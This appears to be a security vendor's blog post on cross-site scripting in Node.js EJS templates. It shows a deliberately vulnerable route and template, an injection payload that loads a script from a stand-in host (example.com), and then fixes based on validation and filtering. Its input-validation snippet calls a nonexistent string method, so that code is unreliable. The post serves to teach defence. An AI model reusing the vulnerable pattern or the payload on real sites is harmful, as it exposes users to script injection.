Escaping is an important security control for preventing cross-site scripting (XSS) in web applications. Escaping is the process of converting certain characters, like <, >, quotation markets, etc. into safe characters. By escaping, you reduce the likelihood of the browser rendering certain characters as HTML when it’s not supposed to.
OWASP.org provides us with a nice definition:
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Going forward, we'll refer to escaping as encoding. Encoding is a fancier way of describing the process of converting untrusted characters into a "safe" format.
Template Engines to the Rescue...
Fortunately, several popular Node.js template engines offer encoding syntax so you can avoid a majority of scenarios that lead to XSS vulnerabilities.
Here are some syntax considerations for popular templating frameworks:
Template Engine | Encode output | Allow raw output (no encoding) |
---|---|---|
EJS | <%= text goes here %> | <%- text goes here %> |
Mustache and Handlebars | {{ text goes here }} | {{{ text goes here }}} |
Pug | #{ text goes here } | !{ text goes here } |
In today's post, we'll be using EJS.
Context is King
Despite use of encoding syntax, XSS can still occur. How is this possible?
In this example, we have a Node.js app that uses Express and EJS for templating. Our app takes a user-supplied age (via the age
query parameter), determines the correct target date mutual funds on the server-side, and prints the fund name to the user (see circle #1 in the image below).
Here’s the Node.js code that selects a mutual fund given a user-supplied age. The code maps the 401k.ejs
EJS template to three data objects:
currentAge
(which should always be an integer)retireAt
(a hard-coded retirement age)selectedFund
(a string returned from thedetermineTargetDateFund()
method)
/* --------------------------------
// routes.js
*/ --------------------------------
app.get('/401k', function(req, res) {
var currentAge = req.query.age;
var retireAt = 65;
var selectedFund = determineTargetDateFund(currentAge, retireAt);
res.render('pages/401k', {
currentAge: currentAge,
retireAt: retireAt,
selectedFund: selectedFund
});
});
The template looks like this:
<!--
// 401k.ejs
//-->
<h3>What target date fund should you pick?</h3>
Enter your age:
<form action="/401k" method="GET">
<input name="age" size="5" value="<%= currentAge %>" onblur="updateYearsAwayFromRetirement(this.value)">
<input type="submit" value=" Go ">
<br>
<span id="yearsAwayFromRetirement" style="font-style: italic"></span>
</form>
<p> </p>
<% if(selectedFund) { %>
You should select this fund: <span><%= selectedFund %></span>
<% } %>
<script language="javascript">
//Initialize page with age submitted to server
updateYearsAwayFromRetirement(<%= currentAge %>)
function updateYearsAwayFromRetirement(ageValue) {
retireAt = <%= retireAt %>;
currentAge = ageValue;
if(currentAge) {
document.getElementById('yearsAwayFromRetirement').innerText = retireAt - currentAge + ' years away from retiring at age ' + retireAt;
}
}
</script>
In every scenario, you’ll see that we use EJS encode syntax before printing it to the page: <%= template_variable_goes_here %>
.
That's good, but not 100% foolproof.
JavaScript != HTML Context
If you look closely, you'll see the EJS variable currentAge
printed as an argument of the JavaScript function updateYearsAwayFromRetirement()
at template render time. This is JavaScript context (!)
This function is subsequently called by the browser on page load to calculate the number of years until retirement (circle #2 in the image above). If the user submitted an age of '45', then the page source will look like this:
In general, you should avoid printing template data inside JavaScript context. Even if you are encoding the data, EJS and other template engines will NOT consider all possible contexts - such as the context of a JavaScript function or script block. This behavior means benign characters in an HTML context can be harmful inside a JavaScript context.
Attack Example
To recap, we print the currentAge
variable using EJS encoding syntax (<%= %>
) in two locations of 401k.ejs
:
- As an argument inside
updateYearsAwayFromRetirement()
(JavaScript context) - As the initial value of the "Enter your age" text field (HTML context)
The EJS encoding syntax works great in the HTML context, but fails to prevent XSS attacks in the JavaScript context. For example, consider what happens when you pass the following string into the age
query parameter:
45); var s = document.createElement(`script`); s.src = `http://example.com/someEvilScript.js`; document.body.appendChild(s); //
You'll notice we are using backticks (`). In HTML context, backticks are benign and treated as text. However, in JavaScript context, backticks are interpreted!
You'll see the full string appear in the source, and a request to someEvilScript.js in the console!
How to Fix
In all cases, double-check context before you print data to a page. JavaScript context isn't the only "non-HTML" context that the browser interprets. Other contexts, like style tags and comment tags, will require different encoders.
(Read more at the OWASP.org XSS Prevention Cheat Sheet.)
Even though we're allowing EJS to automatically encode output, we need to add additional encoding on the server-side to avoid the attack scenario illustrated above.
In many scenarios, output encoding (e.g., removing unsafe characters before printing them to a page) is the best defense against XSS attacks.
For the example above, we want to ensure the currentAge
variable is always an integer. You can also perform input validation so we can reliably calculate the correct mutual fund without invalid characters ever getting in the way.
Input Validation
First, we want to make sure the app properly handles scenarios where non-integer values are passed into the age
query parameter.
To do this, we perform input validation on the currentAge
variable by verifying the data is an integer and greater than zero.
/* --------------------------------
// routes.js
*/ --------------------------------
app.get('/401k', function(req, res) {
var currentAge = req.query.age;
var retireAt = 65;
//Perform input validation on the currentAge variable
if(currentAge.isInteger() && currentAge > 0) {
//continue...
}else{
//throw error...
}
Output Encoding and Filtering
This is the most important step. As I mentioned earlier, encoding is the process of converting untrusted characters into a safe format. Filtering is a bit different and removes untrusted or unwanted characters from the data.
Whenever data is passed to the template engine, output encoding and/or filtering should occur - even if it's just a final sanity check. In our example, we're going to filter results by removing any non-integer values from the currentAge
variable.
/* --------------------------------
// routes.js
*/ --------------------------------
...
res.render('pages/401k', {
//Removes any characters that are 'not digits'
currentAge: (currentAge || '').replace(/\D/g,''),
retireAt: retireAt,
selectedFund: selectedFund
});
...
Recommendations
The above example may manifest itself in web applications with heavy JavaScript front-end architectures. XSS in JavaScript context is not as prolific as XSS in HTML context, but our example highlights the risk of over-reliance on template engines for security.
Here are a few tips:
- Understand your context and apply output encoding and/or filtering
- Avoid printing data in JavaScript context, period: In our example, we printed data from the server-side directly into JavaScript context. When possible, avoid printing data in JavaScript context entirely. If you cannot avoid it, be sure to apply additional output encoding logic on the server-side before passing it to the template engine.
- Harden web apps with a Content-Security-Policy: While not a fix for underlying XSS vulnerability, this configuration can reduce the impact of an XSS attack.
- Keep business logic in one place: A general best practice.
Want a demo of Veracode Interactive Analysis?
Veracode Interactive Analysis (IAST) helps teams instantly discover vulnerabilities in their applications at runtime by embedding security into their development processes and integrating directly into their CI/CD pipelines. Get a demo.